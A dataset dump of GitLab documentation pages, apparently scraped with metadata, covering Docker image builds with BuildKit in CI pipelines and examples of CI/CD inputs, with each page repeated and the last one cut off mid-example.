"{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Build multi-platform images in rootless mode To build images for multiple architectures in rootless mode, configure your job to specify the target platforms. For example: ```yaml build-multiarch-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --opt platform=linux/amd64,linux/arm64 \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Use caching in rootless mode To enable registry-based caching for faster subsequent builds, configure cache import and export in your build job. For example: ```yaml build-cached-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox CACHE_IMAGE: $CI_REGISTRY_IMAGE:cache before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --export-cache type=registry,ref=$CACHE_IMAGE \ --import-cache type=registry,ref=$CACHE_IMAGE \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Use a registry mirror in rootless mode Registry mirrors provide faster image pulls and can help with rate limiting or network restrictions. To configure registry mirrors, create a `buildkit.toml` file that specifies the mirror endpoints. For example: ```yaml build-mirror-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox --config /tmp/buildkit.toml before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json - cat <<'EOF' > /tmp/buildkit.toml [registry."docker.io"] mirrors = ["mirror.example.com"] EOF script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace `mirror.example.com` with your registry mirror URL. ### Configure proxy settings If your GitLab Runner operates behind an HTTP(S) proxy, configure proxy settings as variables in your job. For example: ```yaml build-behind-proxy: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox http_proxy: <your-proxy> https_proxy: <your-proxy> no_proxy: <your-no-proxy> before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --build-arg http_proxy=$http_proxy \ --build-arg https_proxy=$https_proxy \ --build-arg no_proxy=$no_proxy \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace `<your-proxy>` and `<your-no-proxy>` with your proxy configuration. ### Add custom certificates To push to a registry using custom CA certificates, add the certificate to the container's certificate store before building. For example: ```yaml build-with-custom-certs: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - | echo "-----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----" >> /etc/ssl/certs/ca-certificates.crt - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace the certificate placeholder with your actual certificate content. ## Migrate from Kaniko to BuildKit BuildKit rootless is a secure alternative for Kaniko. It offers improved performance, better caching, and enhanced security features while maintaining rootless operation. ### Update your configuration Update your existing Kaniko configuration to use the BuildKit rootless method. For example: Before, with Kaniko: ```yaml build: image: name: gcr.io/kaniko-project/executor:debug entrypoint: [""] script: - /kaniko/executor --context $CI_PROJECT_DIR --dockerfile $CI_PROJECT_DIR/Dockerfile --destination $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA ``` After, with BuildKit rootless: ```yaml build: image: moby/buildkit:rootless variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ## Alternative BuildKit methods If you don't need rootless builds, BuildKit offers additional methods that require the `docker:dind` service but provide familiar workflows or advanced features. ### Docker Buildx Docker Buildx extends Docker build capabilities with BuildKit features while maintaining familiar command syntax. This method requires the `docker:dind` service. #### Build basic images To build Docker images with Buildx, configure your job with the `docker:dind` service and create a `buildx` builder. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" build-image: image: docker:latest services: - docker:dind stage: build before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - docker buildx create --use --driver docker-container --name builder - docker buildx inspect --bootstrap script: - docker buildx build --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push . after_script: - docker buildx rm builder ``` #### Build multi-platform images Multi-platform builds create images for different architectures in a single build command. The resulting manifest supports multiple architectures, and Docker automatically selects the appropriate image for each deployment target. To build images for multiple architectures, add the `--platform` flag to specify target architectures. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" build-multiplatform: image: docker:latest services: - docker:dind stage: build before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - docker buildx create --use --driver docker-container --name multibuilder - docker buildx inspect --bootstrap script: - docker buildx build --platform linux/amd64,linux/arm64 --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push . after_script: - docker buildx rm multibuilder ``` #### Use build caching Registry-based caching stores build layers in a container registry for reuse across builds. The `mode=max` option exports all layers to the cache and provides maximum reuse potential for subsequent builds. To use build caching, add cache options to your build command. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" CACHE_IMAGE: $CI_REGISTRY_IMAGE:cache build-with-cache: image: docker:latest services: - docker:dind stage: build before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - docker buildx create --use --driver docker-container --name cached-builder - docker buildx inspect --bootstrap script: - docker buildx build --cache-from type=registry,ref=$CACHE_IMAGE --cache-to type=registry,ref=$CACHE_IMAGE,mode=max --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push . after_script: - docker buildx rm cached-builder ``` ### Native BuildKit Use native BuildKit `buildctl` commands for more control over the build process. This method requires the `docker:dind` service. To use BuildKit directly, configure your job with the BuildKit image and `docker:dind` service. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" build-with-buildkit: image: moby/buildkit:latest services: - docker:dind stage: build before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ## Troubleshooting ### Build fails with authentication errors If you encounter registry authentication failures: - Verify that `CI_REGISTRY_USER` and `CI_REGISTRY_PASSWORD` variables are available. - Check that you have push permissions to the target registry. - For external registries, ensure authentication credentials are correctly configured in your project's CI/CD variables. ### Rootless build fails with permission errors For permission-related issues in rootless mode: - Ensure `BUILDKITD_FLAGS: --oci-worker-no-process-sandbox` is set. - Verify that the GitLab Runner has sufficient resources allocated. - Check that no privileged operations are attempted in your `Dockerfile`. If you receive `[rootlesskit:child ] error: failed to share mount point: /: permission denied` on a Kubernetes runner, AppArmor is blocking the mount syscall required for BuildKit. To resolve this issue, add the following to your runner configuration: ```toml [runners.kubernetes.pod_annotations] "container.apparmor.security.beta.kubernetes.io/build" = "unconfined" ``` ### Error: `invalid local: stat path/to/image/Dockerfile: not a directory` You might get an error that states `invalid local: stat path/to/image/Dockerfile: not a directory`. This issue occurs when you specify a file path instead of a directory path for the `--local dockerfile=` parameter. BuildKit expects a directory path that contains a file named `Dockerfile`. To resolve this issue, use the directory path instead of the full file path. For example: - Use: `--local dockerfile=path/to/image` - Instead of: `--local dockerfile=path/to/image/Dockerfile` ### Multi-platform builds fail For multi-platform build issues: - Verify that base images in your `Dockerfile` support the target architectures. - Check that architecture-specific dependencies are available for all target platforms. - Consider using conditional statements in your `Dockerfile` for architecture-specific logic.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Build Docker images with BuildKit breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [BuildKit](https://docs.docker.com/build/buildkit/) is the build engine used by Docker and provides multi-platform builds and build caching. ## BuildKit methods BuildKit offers the following methods to build Docker images: | Method | Security requirement | Commands | Use when you need | | ----------------- | ------------------------ | ------------------------ | ----------------- | | BuildKit rootless | No privileged containers | `buildctl-daemonless.sh` | Maximum security or a replacement for Kaniko | | Docker Buildx | Requires `docker:dind` | `docker buildx` | Familiar Docker workflow | | Native BuildKit | Requires `docker:dind` | `buildctl` | Advanced BuildKit control | ## Prerequisites - GitLab Runner with Docker executor - Docker 19.03 or later to use Docker Buildx - A project with a `Dockerfile` ## BuildKit rootless BuildKit in standalone mode provides rootless image builds without Docker daemon dependency. This method eliminates privileged containers entirely and provides a direct replacement for Kaniko builds. Key differences from other methods: - Uses the `moby/buildkit:rootless` image - Includes `BUILDKITD_FLAGS: --oci-worker-no-process-sandbox` for rootless operation - Uses `buildctl-daemonless.sh` to manage BuildKit daemon automatically - No Docker daemon or privileged container dependency - Requires manual registry authentication setup ### Authenticate with container registries GitLab CI/CD provides automatic authentication for the GitLab container registry through predefined variables. For BuildKit rootless, you must manually create the Docker configuration file. #### Authenticate with the GitLab container registry GitLab automatically provides these predefined variables: - `CI_REGISTRY`: Registry URL - `CI_REGISTRY_USER`: Registry username - `CI_REGISTRY_PASSWORD`: Registry password To configure authentication for rootless builds, add a `before_script` configuration to your jobs. For example: ```yaml before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json ``` #### Authenticate with multiple registries To authenticate with additional container registries, combine authentication entries in your `before_script` section. For example: ```yaml before_script: - mkdir -p ~/.docker - | echo "{ \"auths\": { \"${CI_REGISTRY}\": { \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\" }, \"docker.io\": { \"auth\": \"$(printf "%s:%s" "${DOCKER_HUB_USER}" "${DOCKER_HUB_PASSWORD}" | base64 | tr -d '\n')\" } } }" > ~/.docker/config.json ``` #### Authenticate with the dependency proxy To pull images through the GitLab dependency proxy, configure the authentication in your `before_script` section. For example: ```yaml before_script: - mkdir -p ~/.docker - | echo "{ \"auths\": { \"${CI_REGISTRY}\": { \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\" }, \"$(echo -n $CI_DEPENDENCY_PROXY_SERVER | awk -F[:] '{print $1}')\": { \"auth\": \"$(printf "%s:%s" ${CI_DEPENDENCY_PROXY_USER} "${CI_DEPENDENCY_PROXY_PASSWORD}" | base64 | tr -d '\n')\" } } }" > ~/.docker/config.json ``` For more information, see [authenticate within CI/CD](../../user/packages/dependency_proxy/_index.md#authenticate-within-cicd). ### Build images in rootless mode To build images without Docker daemon dependency, add a job similar to this example: ```yaml build-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Build multi-platform images in rootless mode To build images for multiple architectures in rootless mode, configure your job to specify the target platforms. For example: ```yaml build-multiarch-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --opt platform=linux/amd64,linux/arm64 \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Use caching in rootless mode To enable registry-based caching for faster subsequent builds, configure cache import and export in your build job. For example: ```yaml build-cached-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox CACHE_IMAGE: $CI_REGISTRY_IMAGE:cache before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --export-cache type=registry,ref=$CACHE_IMAGE \ --import-cache type=registry,ref=$CACHE_IMAGE \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Use a registry mirror in rootless mode Registry mirrors provide faster image pulls and can help with rate limiting or network restrictions. To configure registry mirrors, create a `buildkit.toml` file that specifies the mirror endpoints. For example: ```yaml build-mirror-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox --config /tmp/buildkit.toml before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json - cat <<'EOF' > /tmp/buildkit.toml [registry."docker.io"] mirrors = ["mirror.example.com"] EOF script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace `mirror.example.com` with your registry mirror URL. ### Configure proxy settings If your GitLab Runner operates behind an HTTP(S) proxy, configure proxy settings as variables in your job. For example: ```yaml build-behind-proxy: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox http_proxy: <your-proxy> https_proxy: <your-proxy> no_proxy: <your-no-proxy> before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --build-arg http_proxy=$http_proxy \ --build-arg https_proxy=$https_proxy \ --build-arg no_proxy=$no_proxy \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace `<your-proxy>` and `<your-no-proxy>` with your proxy configuration. ### Add custom certificates To push to a registry using custom CA certificates, add the certificate to the container's certificate store before building. For example: ```yaml build-with-custom-certs: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - | echo "-----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----" >> /etc/ssl/certs/ca-certificates.crt - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace the certificate placeholder with your actual certificate content. ## Migrate from Kaniko to BuildKit BuildKit rootless is a secure alternative for Kaniko. It offers improved performance, better caching, and enhanced security features while maintaining rootless operation. ### Update your configuration Update your existing Kaniko configuration to use the BuildKit rootless method. For example: Before, with Kaniko: ```yaml build: image: name: gcr.io/kaniko-project/executor:debug entrypoint: [""] script: - /kaniko/executor --context $CI_PROJECT_DIR --dockerfile $CI_PROJECT_DIR/Dockerfile --destination $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA ``` After, with BuildKit rootless: ```yaml build: image: moby/buildkit:rootless variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ## Alternative BuildKit methods If you don't need rootless builds, BuildKit offers additional methods that require the `docker:dind` service but provide familiar workflows or advanced features. ### Docker Buildx Docker Buildx extends Docker build capabilities with BuildKit features while maintaining familiar command syntax. This method requires the `docker:dind` service. #### Build basic images To build Docker images with Buildx, configure your job with the `docker:dind` service and create a `buildx` builder. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" build-image: image: docker:latest services: - docker:dind stage: build before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - docker buildx create --use --driver docker-container --name builder - docker buildx inspect --bootstrap script: - docker buildx build --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push . after_script: - docker buildx rm builder ``` #### Build multi-platform images Multi-platform builds create images for different architectures in a single build command. The resulting manifest supports multiple architectures, and Docker automatically selects the appropriate image for each deployment target. To build images for multiple architectures, add the `--platform` flag to specify target architectures. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" build-multiplatform: image: docker:latest services: - docker:dind stage: build before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - docker buildx create --use --driver docker-container --name multibuilder - docker buildx inspect --bootstrap script: - docker buildx build --platform linux/amd64,linux/arm64 --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push . after_script: - docker buildx rm multibuilder ``` #### Use build caching Registry-based caching stores build layers in a container registry for reuse across builds. The `mode=max` option exports all layers to the cache and provides maximum reuse potential for subsequent builds. To use build caching, add cache options to your build command. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" CACHE_IMAGE: $CI_REGISTRY_IMAGE:cache build-with-cache: image: docker:latest services: - docker:dind stage: build before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - docker buildx create --use --driver docker-container --name cached-builder - docker buildx inspect --bootstrap script: - docker buildx build --cache-from type=registry,ref=$CACHE_IMAGE --cache-to type=registry,ref=$CACHE_IMAGE,mode=max --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push . after_script: - docker buildx rm cached-builder ``` ### Native BuildKit Use native BuildKit `buildctl` commands for more control over the build process. This method requires the `docker:dind` service. To use BuildKit directly, configure your job with the BuildKit image and `docker:dind` service. For example: ```yaml variables: DOCKER_TLS_CERTDIR: "/certs" build-with-buildkit: image: moby/buildkit:latest services: - docker:dind stage: build before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ## Troubleshooting ### Build fails with authentication errors If you encounter registry authentication failures: - Verify that `CI_REGISTRY_USER` and `CI_REGISTRY_PASSWORD` variables are available. - Check that you have push permissions to the target registry. - For external registries, ensure authentication credentials are correctly configured in your project's CI/CD variables. ### Rootless build fails with permission errors For permission-related issues in rootless mode: - Ensure `BUILDKITD_FLAGS: --oci-worker-no-process-sandbox` is set. - Verify that the GitLab Runner has sufficient resources allocated. - Check that no privileged operations are attempted in your `Dockerfile`. If you receive `[rootlesskit:child ] error: failed to share mount point: /: permission denied` on a Kubernetes runner, AppArmor is blocking the mount syscall required for BuildKit. To resolve this issue, add the following to your runner configuration: ```toml [runners.kubernetes.pod_annotations] "container.apparmor.security.beta.kubernetes.io/build" = "unconfined" ``` ### Error: `invalid local: stat path/to/image/Dockerfile: not a directory` You might get an error that states `invalid local: stat path/to/image/Dockerfile: not a directory`. This issue occurs when you specify a file path instead of a directory path for the `--local dockerfile=` parameter. BuildKit expects a directory path that contains a file named `Dockerfile`. To resolve this issue, use the directory path instead of the full file path. For example: - Use: `--local dockerfile=path/to/image` - Instead of: `--local dockerfile=path/to/image/Dockerfile` ### Multi-platform builds fail For multi-platform build issues: - Verify that base images in your `Dockerfile` support the target architectures. - Check that architecture-specific dependencies are available for all target platforms. - Consider using conditional statements in your `Dockerfile` for architecture-specific logic.
https://docs.gitlab.com/ci/examples
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/examples.md
2025-08-13
doc/ci/inputs
[ "doc", "ci", "inputs" ]
examples.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
CI/CD input examples
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [CI/CD inputs](_index.md) increase the flexibility of your CI/CD configuration. Use these examples as guidelines for configuring your pipeline to use inputs. ## Include the same file multiple times You can include the same file multiple times, with different inputs. However, if multiple jobs with the same name are added to one pipeline, each additional job overwrites the previous job with the same name. You must ensure the configuration prevents duplicate job names. For example, including the same configuration multiple times with different inputs: ```yaml include: - local: path/to/my-super-linter.yml inputs: linter: docs lint-path: "doc/" - local: path/to/my-super-linter.yml inputs: linter: yaml lint-path: "data/yaml/" ``` The configuration in `path/to/my-super-linter.yml` ensures the job has a unique name each time it is included: ```yaml spec: inputs: linter: lint-path: --- "run-$[[ inputs.linter ]]-lint": script: ./lint --$[[ inputs.linter ]] --path=$[[ inputs.lint-path ]] ``` ## Reuse configuration in `inputs` To reuse configuration with `inputs`, you can use [YAML anchors](../yaml/yaml_optimization.md#anchors). For example, to reuse the same `rules` configuration with multiple components that support `rules` arrays in the inputs: ```yaml .my-job-rules: &my-job-rules - if: $CI_PIPELINE_SOURCE == "merge_request_event" - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH include: - component: $CI_SERVER_FQDN/project/path/component1@main inputs: job-rules: *my-job-rules - component: $CI_SERVER_FQDN/project/path/component2@main inputs: job-rules: *my-job-rules ``` You cannot use [`!reference` tags](../yaml/yaml_optimization.md#reference-tags) in inputs, but [issue 424481](https://gitlab.com/gitlab-org/gitlab/-/issues/424481) proposes adding this functionality. ## Use `inputs` with `needs` You can use array type inputs with [`needs`](../yaml/_index.md#needs) for complex job dependencies. For example, in a file named `component.yml`: ```yaml spec: inputs: first_needs: type: array second_needs: type: array --- test_job: script: echo "this job has needs" needs: - $[[ inputs.first_needs ]] - $[[ inputs.second_needs ]] ``` In this example, the inputs are `first_needs` and `second_needs`, both [array type inputs](_index.md#array-type). Then, in a `.gitlab-ci.yml` file, you can add this configuration and set the input values: ```yaml include: - local: 'component.yml' inputs: first_needs: - build1 second_needs: - build2 ``` When the pipeline starts, the items in the `needs` array for `test_job` get concatenated into: ```yaml test_job: script: echo "this job has needs" needs: - build1 - build2 ``` ### Allow `needs` to be expanded when included You can have [`needs`](../yaml/_index.md#needs) in an included job, but also add additional jobs to the `needs` array with `spec:inputs`. For example: ```yaml spec: inputs: test_job_needs: type: array default: [] --- build-job: script: - echo "My build job" test-job: script: - echo "My test job" needs: - build-job - $[[ inputs.test_job_needs ]] ``` In this example: - `test-job` job always needs `build-job`. - By default the test job doesn't need any other jobs, as the `test_job_needs:` array input is empty by default. To set `test-job` to need another job in your configuration, add it to the `test_needs` input when you include the file. For example: ```yaml include: - component: $CI_SERVER_FQDN/project/path/component@1.0.0 inputs: test_job_needs: [my-other-job] my-other-job: script: - echo "I want build-job` in the component to need this job too" ``` ### Add `needs` to an included job that doesn't have `needs` You can add [`needs`](../yaml/_index.md#needs) to an included job that does not have `needs` already defined. For example, in a CI/CD component's configuration: ```yaml spec: inputs: test_job: default: test-job --- build-job: script: - echo "My build job" "$[[ inputs.test_job ]]": script: - echo "My test job" ``` In this example, the `spec:inputs` section allows the job name to be customized. Then, after you include the component, you can extend the job with the additional `needs` configuration. For example: ```yaml include: - component: $CI_SERVER_FQDN/project/path/component@1.0.0 inputs: test_job: my-test-job my-test-job: needs: [my-other-job] my-other-job: script: - echo "I want `my-test-job` to need this job" ``` ## Use `inputs` with `include` for more dynamic pipelines You can use `inputs` with `include` to select which additional pipeline configuration files to include. For example: ```yaml spec: inputs: pipeline-type: type: string default: development options: ['development', 'canary', 'production'] description: "The pipeline type, which determines which set of jobs to include." --- include: - local: .gitlab/ci/$[[ inputs.pipeline-type ]].gitlab-ci.yml ``` In this example, the `.gitlab/ci/development.gitlab-ci.yml` file is included by default. But if a different `pipeline-type` input option is used, a different configuration file is included. ### Use CI/CD inputs in variable expressions You can use [CI/CD inputs](_index.md) to customize variable expressions. For example: ```yaml example-job: script: echo "Testing" rules: - if: '"$[[ inputs.some_example ]]" == "test-branch"' ``` The expression is evaluated in two steps: 1. Input interpolation: Before the pipeline is created, inputs are replaced with the input value. In this example, the `$[[ inputs.some_example ]]` input is replaced with the [set value](_index.md#set-input-values). For example, if the value is: - `test-branch`, the expression becomes `if: '"test-branch" == "test-branch"'`. - `$CI_COMMIT_BRANCH`, the expression becomes `if: '"$CI_COMMIT_BRANCH" == "test-branch"'`. 1. Expression evaluation: After the inputs are interpolated, GitLab attempts to create the pipeline. During pipeline creation, the expressions are evaluated to determine which jobs to add to the pipeline.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: CI/CD input examples breadcrumbs: - doc - ci - inputs --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [CI/CD inputs](_index.md) increase the flexibility of your CI/CD configuration. Use these examples as guidelines for configuring your pipeline to use inputs. ## Include the same file multiple times You can include the same file multiple times, with different inputs. However, if multiple jobs with the same name are added to one pipeline, each additional job overwrites the previous job with the same name. You must ensure the configuration prevents duplicate job names. For example, including the same configuration multiple times with different inputs: ```yaml include: - local: path/to/my-super-linter.yml inputs: linter: docs lint-path: "doc/" - local: path/to/my-super-linter.yml inputs: linter: yaml lint-path: "data/yaml/" ``` The configuration in `path/to/my-super-linter.yml` ensures the job has a unique name each time it is included: ```yaml spec: inputs: linter: lint-path: --- "run-$[[ inputs.linter ]]-lint": script: ./lint --$[[ inputs.linter ]] --path=$[[ inputs.lint-path ]] ``` ## Reuse configuration in `inputs` To reuse configuration with `inputs`, you can use [YAML anchors](../yaml/yaml_optimization.md#anchors). For example, to reuse the same `rules` configuration with multiple components that support `rules` arrays in the inputs: ```yaml .my-job-rules: &my-job-rules - if: $CI_PIPELINE_SOURCE == "merge_request_event" - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH include: - component: $CI_SERVER_FQDN/project/path/component1@main inputs: job-rules: *my-job-rules - component: $CI_SERVER_FQDN/project/path/component2@main inputs: job-rules: *my-job-rules ``` You cannot use [`!reference` tags](../yaml/yaml_optimization.md#reference-tags) in inputs, but [issue 424481](https://gitlab.com/gitlab-org/gitlab/-/issues/424481) proposes adding this functionality. ## Use `inputs` with `needs` You can use array type inputs with [`needs`](../yaml/_index.md#needs) for complex job dependencies. For example, in a file named `component.yml`: ```yaml spec: inputs: first_needs: type: array second_needs: type: array --- test_job: script: echo "this job has needs" needs: - $[[ inputs.first_needs ]] - $[[ inputs.second_needs ]] ``` In this example, the inputs are `first_needs` and `second_needs`, both [array type inputs](_index.md#array-type). Then, in a `.gitlab-ci.yml` file, you can add this configuration and set the input values: ```yaml include: - local: 